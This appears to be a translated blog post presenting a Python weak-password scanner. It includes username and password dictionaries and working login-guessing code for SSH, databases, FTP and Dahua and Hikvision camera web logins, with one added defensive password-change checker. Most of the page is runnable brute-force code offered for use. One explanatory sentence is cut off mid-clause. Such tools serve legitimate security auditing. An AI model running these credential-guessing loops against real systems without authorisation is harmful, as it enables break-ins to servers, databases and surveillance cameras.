Weak password scanning tool: SSH, PostgreSQL, Redis, MySQL, MongoDB, FTP, SQL Server (MSSQL), Dahua, Hikvision; 9 weak-password detection sets

Weak password vulnerability

  • Weak password tools
    • Username-password set
    • 1. SSH weak password
    • 2. PostgreSQL weak password
    • 3. Redis weak password
    • 4. MySQL weak password
    • 5. MongoDB weak password
    • 6. Weak FTP password
    • 7. SQL Server (MSSQL) weak password
    • 8. Dahua weak password
    • 9. Hikvision weak password
  • Tool source code address

Weak password tools

This tool is a modified version of an existing tool on GitHub. The original tool supported only 3 weak-password scans; this version increases that to 9 and also changes how the usernames and passwords are used.

The tool currently supports weak-password scanning for 9 services and web interfaces: SSH, PostgreSQL, Redis, MySQL, MongoDB, FTP, SQL Server (MSSQL), Dahua, and Hikvision.

Code language: python3

Username-password set

The username_dict dictionary holds the usernames to try for each service category; you can add your own.
The passwords_list list is a shared password list. The {user} placeholder in an entry is replaced with the username being tested. You can add to and modify the list.

username_dict = {
    "ftp": ["ftp", "anonymous"],
    # "ftp": ["ftp", "admin", "www", "web", "root", "db", "wwwroot", "data"],
    "mysql": ["root", "mysql", "admin", "test"],
    "mssql": ["sa"],
    # "smb": ["administrator", "admin", "guest"],
    # "rdp": ["administrator", "admin", "guest"],
    "postgresql": ["postgres", "admin"],
    "ssh": ["root", "admin"],
    "mongodb": ["root", "admin"],
    # "oracle": ["sys", "system", "admin", "test", "web", "orcl"],
    "dahua": ["admin", "dahua", "root", "test"],
    "hikvision": ["admin"]
}

passwords_list = ["123456", "12345", 'asdf1234', 'abc12345', '12345{user}', "{user}12345", '12345abc', "admin", "admin123", "root",
                  "", "pass123", "pass@123", "password", "123123", "654321", "111111",
                  "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user} 1", "{user}111", "{user}123",
                  "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "{user}@123#4", "P@ssw0rd!",
                  "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe", "123qwe!@# ", "123456789",
                  "123321", "666666", "a123456.", "123456~a", "123456!a", "000000", "1234567890", "8888888 ", "888888", "!QAZ2wsx",
                  "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456",
                  "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "1qaz!QAZ", "2wsx@WSX ", "qwe123!@#",
                  "Aa123456!", "A123456s!", "sa123456", "1q2w3e", "Charge123", "Aa123456789", "pwd@123456"]
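The same {user} expansion can be applied on the defensive side, at password-change time, to refuse any password that a template list like the one above would produce for that account. This is an added example, not part of the original tool: WEAK_TEMPLATES is a constructed subset in the page's format, and the function names and account-name formats are assumptions.

```python
# Added example (not from the original tool): password-change check that
# rejects anything a {user}-template list would guess for the account.
import unicodedata

# Constructed subset in the page's format; load your full list in practice.
WEAK_TEMPLATES = [
    "123456", "password", "admin123", "P@ssw0rd", "sa123456", "",
    "{user}", "{user}123", "{user}@123", "12345{user}", "{user}@2019",
]

def _norm(s):
    """Unicode-normalise and casefold so 'Root@123' matches 'root@123'."""
    return unicodedata.normalize("NFKC", s).casefold()

def username_variants(username):
    """Names likely to be substituted for {user}: the full name plus the
    local part of 'user@domain' and 'DOMAIN\\user' (assumed formats)."""
    names = {username,
             username.split("@", 1)[0],
             username.rsplit("\\", 1)[-1]}
    return {n for n in names if n}

def expand(templates, username):
    """Expand {user} with str.replace, as the page's tool does."""
    return {_norm(t.replace("{user}", name))
            for name in username_variants(username)
            for t in templates}

def check_password(username, candidate, templates=WEAK_TEMPLATES):
    """Return (ok, reason); ok is False when the candidate is guessable."""
    cand = _norm(candidate)
    if cand in expand(templates, username):
        return False, "matches weak-password template"
    # Also catch short padding around the username, e.g. 'backup!!'.
    for name in username_variants(username):
        n = _norm(name)
        if len(n) >= 3 and n in cand and len(cand) - len(n) <= 4:
            return False, "username plus short suffix/prefix"
    return True, "ok"

if __name__ == "__main__":
    samples = [("postgres", "Postgres@123"), ("sa", "sa123456"),
               ("alice@example.com", "alice123"), ("backup", "backup!!"),
               ("root", "c0rrect-h0rse-9")]  # constructed sample inputs
    for user, pw in samples:
        print(user, repr(pw), check_password(user, pw))
```

Matching is case-insensitive on purpose, so the check also rejects case variants of the template entries.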

1. SSH weak password

Part of the key code is as follows:

name, pwd = self.qlist.get().split(':')
if "{user}" in pwd:
    pwd = pwd.replace("{user}", name)
try:
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(hostname=self.host,port=self.port,username=name,password=pwd,timeout=self.timeout)
    time.sleep(0.05)
    ssh.close()
    s = "[OK] %s:%s" % (name,pwd)
    self.show_log(self.host,s)
    self.result.append(s)
except socket.timeout:
    self.show_log(self.host,"Timeout...")
    self.qlist.put(name + ':' + pwd)
    time.sleep(3)
except Exception as e:
    error = "[Error] %s:%s" % (name,pwd)
    self.show_log(self.host,error)
    pass

2. PostgreSQL weak password

Part of the key code is as follows:

name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
    pwd = pwd.replace("{user}", name)
try:
    pgscon = psycopg2.connect(host=self.host, port=self.port, user=name, password=pwd)
    time.sleep(0.02)
    pgscon.close()
    s = "[OK] %s:%s" % (name,pwd)
    self.show_log(self.host,s)
    self.result.append(s)
except socket.timeout:
    self.show_log(self.host,"Timeout...")
    self.qlist.put(name + ':' + pwd)
    time.sleep(3)
except Exception as e:
    # print(e)
    error = "[Error] %s:%s" % (name,pwd)
    self.show_log(self.host,error)
    pass

3. Redis weak password

Redis has no username by default, so only the password list is used here.
The key code is as follows:

pwd = self.qlist.get()
if "{user}" in pwd:
    pwd = pwd.replace("{user}", "redis")
try:
    conn = redis.Redis(host=self.host, port=self.port, password=pwd)
    conn.ping()
    # time.sleep(0.05)
    s = "[OK] :%s" % (pwd)
    if pwd == "":
        s += "(no password)"
    self.show_log(self.host,s)
    self.result.append(s)
except socket.timeout:
    self.show_log(self.host,"Timeout...")
    self.qlist.put(':' + pwd)
    time.sleep(1)
except Exception as e:
    error = "[Error] :%s" % (pwd)
    self.show_log(self.host,error)
    pass

4. MySQL weak password

The key code is as follows:

name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
    pwd = pwd.replace("{user}", name)
try:
    conn = pymysql.connect(host=self.host, user=name, passwd=pwd, db='mysql', port=self.port)
    if conn:
        # time.sleep(0.05)
        conn.close()
    s = "[OK] %s:%s" % (name,pwd)
    self.show_log(self.host,s)
    self.result.append(s)
except socket.timeout:
    self.show_log(self.host,"Timeout")
    self.qlist.put(name + ':' + pwd)
    time.sleep(3)
except Exception as e:
    # print(e)
    error = "[Error] %s:%s" % (name,pwd)
    self.show_log(self.host,error)
    pass

5. MongoDB weak password

The MongoDB check uses different calls depending on the pymongo version, because the API differs before and after version 4.0. The version is checked here and does not affect
The key code is as follows:

pymongo_ver = pymongo.version
name, pwd = self.qlist.get().split(':')
if "{user}" in pwd:
    pwd = pwd.replace("{user}", name)
try:
    if int(pymongo_ver.split(".")[0]) >= 4:
        conn = pymongo.MongoClient(host=self.host, port=self.port, username=name, password=pwd, socketTimeoutMS=3000)
        conn.list_database_names()
    else:
        conn = pymongo.MongoClient(host=self.host, port=self.port, socketTimeoutMS=3000)
        if name or pwd:
            db = conn.admin
            db.authenticate(name, pwd)
        else:
            conn.list_database_names()
    conn.close()
    s = "[OK] %s:%s" % (name,pwd)
    self.show_log(self.host,s)
    self.result.append(s)
except socket.timeout:
    self.show_log(self.host,"Timeout...")
    self.qlist.put(name + ':' + pwd)
    time.sleep(3)
except Exception as e:
    # print(e)
    error = "[Error] %s:%s" % (name,pwd)
    self.show_log(self.host,error)
    pass

6. Weak FTP password

The FTP check also covers anonymous login: it first tries to log in anonymously, and then scans with the username and password list.
The key code is as follows:

# Anonymous login
try:
    if not self.is_exit:
        ftpclient = ftplib.FTP()
        ftpclient.connect(host=self.host, port=self.port)
        ftpclient.login()
        ftpclient.close()
        s = "[OK] %s:%s" % ("Anonymous login", "Anonymous login")
        self.show_log(self.host, s)
        self.result.append(s)
        self.is_exit = True
        self.qlist.queue.clear()
except Exception as e:
    print("Anonymous login error:", e)
name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
    pwd = pwd.replace("{user}", name)
try:
    ftpclient = ftplib.FTP()
    ftpclient.connect(host=self.host, port=self.port, timeout=3)
    ftpclient.login(name, pwd)
    ftpclient.close()

    s = "[OK] %s:%s" % (name,pwd)
    self.show_log(self.host,s)
    self.result.append(s)
except socket.timeout:
    self.show_log(self.host,"Timeout")
    self.qlist.put(name + ':' + pwd)
    time.sleep(3)
except Exception as e:
    print(e)
    error = "[Error] %s:%s" % (name,pwd)
    self.show_log(self.host,error)
    pass

7. SQL Server (MSSQL) weak password

sqlserver and mssql refer to the same product.
The key code is as follows:

name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
    pwd = pwd.replace("{user}", name)
try:
    conn = pymssql.connect(host=self.host, port=self.port, user=name, password=pwd)
    if conn:
        # time.sleep(0.05)
        conn.close()
    s = "[OK] %s:%s" % (name,pwd)
    self.show_log(self.host,s)
    self.result.append(s)
except socket.timeout:
    self.show_log(self.host,"Timeout")
    self.qlist.put(name + ':' + pwd)
    time.sleep(3)
except Exception as e:
    print(e)
    error = "[Error] %s:%s" % (name,pwd)
    self.show_log(self.host,error)
    pass

8. Dahua weak password

The key code is as follows:

ip = self.host + ":" + str(self.port)  # str() so an integer port does not raise TypeError
url = f"http://{ip}/RPC2_Login"
headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
    'Host': ip,
    'Origin': 'http://' + ip,
    'Referer': 'http://' + ip,
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Connection': 'close',
    'X-Requested-With': 'XMLHttpRequest',
}




name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
    pwd = pwd.replace("{user}", name)
print(name,pwd)
_json = {
    "method": "global.login",
    "params": {
        "userName": name,
        "password": pwd,
        "clientType": "Web3.0",
        "loginType": "Direct",
        "authorityType": "Default",
        "passwordType": "Plain",
    },
    "id": 1,
    "session": 0,
}
try:
    r = requests.post(url, headers=headers, json=_json, verify=False, timeout=5)
    if r.status_code == 200 and r.json()['result'] == True:
        s = "[OK] %s:%s" % (name,pwd)
        self.show_log(self.host,s)
        self.result.append(s)
except socket.timeout:
    self.show_log(self.host,"Timeout")
    self.qlist.put(name + ':' + pwd)
    time.sleep(3)
    print("Timeout")
except Exception as e:
    print(e)
    error = "[Error] %s:%s" % (name,pwd)
    self.show_log(self.host,error)
    pass

9. Hikvision weak password

The key code is as follows:

ip = self.host + ":" + str(self.port)  # str() so an integer port does not raise TypeError
url = f"http://{ip}/ISAPI/Security/userCheck"
headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
    'Connection': 'close'
}


name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
    pwd = pwd.replace("{user}", name)
# print(name,pwd)
try:
    r = requests.get(url, auth=(name, pwd), timeout=10, headers=headers, verify=False)
    print(r.status_code)
    print(r.text)
    if r.status_code == 200 and 'userCheck' in r.text and 'statusValue' in r.text and '200' in r.text:
        s = "[OK] %s:%s" % (name,pwd)
        self.show_log(self.host,s)
        self.result.append(s)
except socket.timeout:
    self.show_log(self.host,"Timeout")
    self.qlist.put(name + ':' + pwd)
    time.sleep(3)
    print("Timeout")
except Exception as e:
    print(e)
    # error = "[Error] %s:%s" % (name,pwd)
    # self.show_log(self.host,error)
    pass

Tool source code address

GitHub address: WeakpassScan